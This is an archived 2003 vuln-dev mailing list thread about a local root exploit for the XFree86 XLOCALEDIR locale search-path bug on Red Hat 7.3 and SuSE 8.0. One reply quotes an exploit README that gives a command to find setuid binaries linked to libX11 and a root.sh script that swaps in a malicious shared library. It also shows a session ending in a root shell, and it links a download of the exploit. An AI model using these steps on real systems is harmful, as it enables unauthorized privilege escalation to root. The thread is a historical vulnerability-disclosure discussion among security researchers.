On my fresh RH7.3 installation, nothing compiled with that lib is setuid, not even xterm. -----Original Message----- From: H D Moore [mailto:sflistat_private] Sent: Sunday, 9 March 2003 6:51 PM To: Adam Gilmore; vuln-devat_private Subject: Re: xscreensaver exploit for Redhat 7.3 An old exploit I wrote for the XLOCALEDIR search path bug, it should apply to a default Red Hat 7.3 install... http://www.digitaloffense.net/shared_library_toys/xlocaledir.tar.gz --- $ cat README This is an exploit for a bug in xf86 4.2.0 and below, an announcement was made by SuSE, with id SuSE-SA:2002:032. There is one major caveat to it though, the setuid application you call has to call XtAppInitialize as root. The "xterm" example in the tarball will absolutely not work, because it drops privileges before initializing the application... $ ./xterm ** calling XtSetLanguageProc as 500/0 ** called XtSetLanguageProc as 500/0 ( xterm drops privs here ) ** XtSetErrorHandler: 500/500 ** XtAppInitialize: 500/500 ** not launching a shell, since we are running as id 500 (<- exploit.so) ** XtSetErrorHandler: 500/500 ** XtGetApplicationResources: 500/500 Failed to open input method (complains that the locale stuff is broken) (launches xterm) So.. For this to be useful at all, you have to find a setuid app which doesn't drop privileges until after the XtAppInitialize call :( To get a list of all suid's linked against libX11: # find / -perm +4000 -type f | xargs -i bash -c 'echo "Testing {}";ldd {}|grep X11' Once you find a linked binary (not xterm or cardinfo though), edit root.sh and change the xterm line to the name of the binary. Execute root.sh and see if it drops a root shell ;) The "dga" setuid on SuSE 8.0 gives root in a default install, just don't run the exploit with the same X display as the one you are using or dga will more than likely crash it. Either run the exploit from the console (or remote connection), setting the display to :0.0, or start a second X server up just to exploit (method used below). hdm@masada:/projects/xlocaledir> cat root.sh #!/bin/sh ######### rm -rf locale cp -a /usr/lib/X11/locale locale make clean make cp exploit.so locale/common/xlcDef.so.2 export XLOCALEDIR=`pwd`/locale # call your setuid here... /usr/X11R6/bin/dga hdm@masada:/projects/xlocaledir> Xwrapper :1 & [1] 1480 hdm@masada:/projects/xlocaledir> XFree86 Version 4.2.0 / X Window System (protocol Version 11, revision 0, vendor release 6600) Release Date: 23 January 2002 If the server is older than 6-12 months, or if your card is newer than the above date, look for a newer version before reporting problems. (See http://www.XFree86.Org/) Build Operating System: SuSE Linux [ELF] SuSE Module Loader present Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: "/var/log/XFree86.1.log", Time: Thu Sep 19 13:45:56 2002 (==) Using config file: "/etc/X11/XF86Config" (II) [GLX]: Calling GlxExtensionInit hdm@masada:/projects/xlocaledir> export DISPLAY=:1.0 hdm@masada:/projects/xlocaledir> ./root.sh /bin/rm -f exploit.o exploit.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so 1 addr:0x40227000, width 1792, bank size 33357824, depth 24 planes ** attempting to drop a root shell... sh-2.05# (II) [GLX]: Calling GlxExtensionInit sh-2.05# id uid=0(root) gid=100(users) groups=100(users),14(uucp),16(dialout),17(audio),33(video),42(trusted) On Saturday 08 March 2003 02:47 am, Adam Gilmore wrote: > I don't think there are any vulnerabilities for the default > installation of RH7.3 (as far as suid root apps go). I tested this > vulnerability on xterm as well, but it seems xterm on RH7.3 drops root > privileges before it overflows. And besides, xterm isn't setuid root on > RH7.3 by default. So this isn't a *major* security risk for rh. > > -----Original Message----- > From: Inode [mailto:inodeat_private] > Sent: Saturday, 8 March 2003 6:46 AM > To: vuln-devat_private > Subject: Re: xscreensaver exploit for Redhat 7.3 > > Hi all, > exploit attached. > > Comments are welcome. > > Sincerely, > > +-------------------------------------------------------------------+ > > | Agazzini Maurizio Tel: +39-011-32.72.100 | > | Security Analyst Fax: +39-011-32.46.497 | > | @ Mediaservice.net S.R.L. D.S.D. Data Security Division | > | > | PGP Key : http://www.wayreth.eu.org/Inode.asc | > | Disclaimer: http://@Mediaservice.net/disclaimer | > > +-------------------------------------------------------------------+
This archive was generated by hypermail 2b30 : Mon Mar 10 2003 - 14:31:51 PST